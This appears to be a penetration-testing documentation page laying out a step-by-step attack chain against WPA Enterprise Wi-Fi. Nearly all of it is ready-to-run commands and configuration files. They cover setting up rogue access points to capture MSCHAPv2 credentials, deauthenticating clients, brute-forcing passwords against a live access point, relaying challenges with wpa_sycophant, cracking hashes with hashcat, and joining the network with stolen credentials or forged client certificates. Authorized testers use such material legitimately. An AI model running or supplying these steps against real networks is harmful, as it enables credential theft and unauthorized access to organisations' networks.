Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
WPA Enterprise authenticates users via 802.1X/RADIUS. Attacks target the authentication exchange itself: lure clients to a rogue AP, capture their MSCHAPv2 hashes or relay the challenge directly, then crack or relay to gain access.
Attack flow:
Recon → Rogue AP → Deauth → Capture credentials → Crack / Relay
Attack 1. Rogue AP (Credential Capture)
Clients that don’t validate the server certificate connect to the rogue AP and expose their MSCHAPv2 challenge/response.
Manual (hostapd-mana)
Step 1: Generate FreeRADIUS certificates:
sudo apt install freeradius freeradius-utils
cd /etc/freeradius/3.0/certs
nano ca.cnf # set country, org, CN
nano server.cnf # set server details
rm dh && make
/etc/hostapd-mana/mana.eap_user):
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
network.conf):
ssid=<TARGET-SSID>
interface=<INTERFACE>
driver=nl80211
channel=<CHANNEL>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
sudo hostapd-mana network.conf
/tmp/hostapd.credoutfile.
Step 1: Generate self-signed certificate:
cd ~/tools/eaphammer
python3 ./eaphammer --cert-wizard
python3 ./eaphammer -i wlan1 \
--auth wpa-eap \
--essid <TARGET-SSID> \
--creds \
--negotiate balanced
Deauth (both approaches)
Force clients off the real AP to trigger reconnection to the rogue:
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 -a <BSSID> wlan0mon -c <CLIENT-MAC>
Attack 2. Rogue AP with Cloned Certificate
When clients validate the server certificate, the rogue AP must present the real certificate to be trusted. Requires the CA and server cert obtained during recon.
Manual (berate_ap)
Convert certs to PEM and generate DH:
openssl x509 -in ca.crt -out hostapd.ca.pem -outform PEM
openssl x509 -in server.crt -out hostapd.cert.pem -outform PEM
openssl rsa -in server.key -out hostapd.key.pem
openssl dhparam -out hostapd.dh.pem 2048
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant \
--mana-credout output.log \
--eap-cert-path /path/to/certs/ \
wlan1 lo <TARGET-SSID>
Import the real certificate:
python3 ./eaphammer --cert-wizard import \
--server-cert /path/to/server.crt \
--ca-cert /path/to/ca.crt \
--private-key /path/to/server.key \
--private-key-passwd whatever
python3 ./eaphammer -i wlan1 \
--auth wpa-eap \
--essid <TARGET-SSID> \
--creds \
--negotiate balanced
Attack 3. Online Brute Force (air-hammer)
When a valid username is known (from recon), brute force their password directly against the live AP.
Brute force single user:
cd ~/tools/air-hammer
echo 'DOMAIN\username' > target.user
./air-hammer.py -i wlan1 -e <SSID> -p ~/rockyou-top100000.txt -u target.user
cat ~/usernames.txt | awk '{print "DOMAIN\\" $1}' > ~/domain-users.txt
./air-hammer.py -i wlan1 -e <SSID> -P <PASSWORD> -u ~/domain-users.txt
Attack 4. MSCHAPv2 Relay (wpa_sycophant)
Relay the victim’s MSCHAPv2 challenge/response to the real AP, authenticates as the victim without knowing the password.
Step 1: Set rogue AP MAC:
systemctl stop network-manager
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up
network={
ssid="<TARGET-SSID>"
scan_ssid=1
key_mgmt=WPA-EAP
identity=""
anonymous_identity=""
password=""
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
bssid_blacklist=F0:9F:C2:00:00:00
}
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant \
--mana-credout output.log \
wlan1 lo <TARGET-SSID>
airmon-ng start wlan0
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>
cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan2
phase1:
Cracking Captured Hashes
hashcat (mode 5500: MSCHAPv2):
# From eaphammer log
cat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500
# Crack
hashcat -a 0 -m 5500 hashcat.5500 ~/rockyou.txt --force
hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt --force
asleap -C <CHALLENGE> -R <RESPONSE> -W ~/rockyou.txt
Authenticating with Obtained Credentials
PEAP/MSCHAPv2 (cracked password)
wpa-corp.conf:
network={
ssid="<TARGET-SSID>"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="DOMAIN\username"
password="<CRACKED-PASSWORD>"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
sudo airmon-ng stop wlan0mon
sudo wpa_supplicant -Dnl80211 -i <INTERFACE> -c wpa-corp.conf
sudo dhclient <INTERFACE> -v
EAP-TLS (client certificate from obtained CA)
Generate client certificate using the real CA:
openssl genrsa -out client.key 2048
openssl req -config client.conf -new -key client.key -out client.csr
openssl x509 -days 730 -extfile client.ext \
-CA ca.crt -CAkey ca.key -CAserial ca.serial \
-in client.csr -req -out client.crt
wpa-tls.conf:
network={
ssid="<TARGET-SSID>"
scan_ssid=1
mode=0
proto=RSN
key_mgmt=WPA-EAP
auth_alg=OPEN
eap=TLS
identity="DOMAIN\username"
ca_cert="./ca.crt"
client_cert="./client.crt"
private_key="./client.key"
private_key_passwd="whatever"
}
sudo wpa_supplicant -Dnl80211 -i <INTERFACE> -c wpa-tls.conf
sudo dhclient <INTERFACE> -v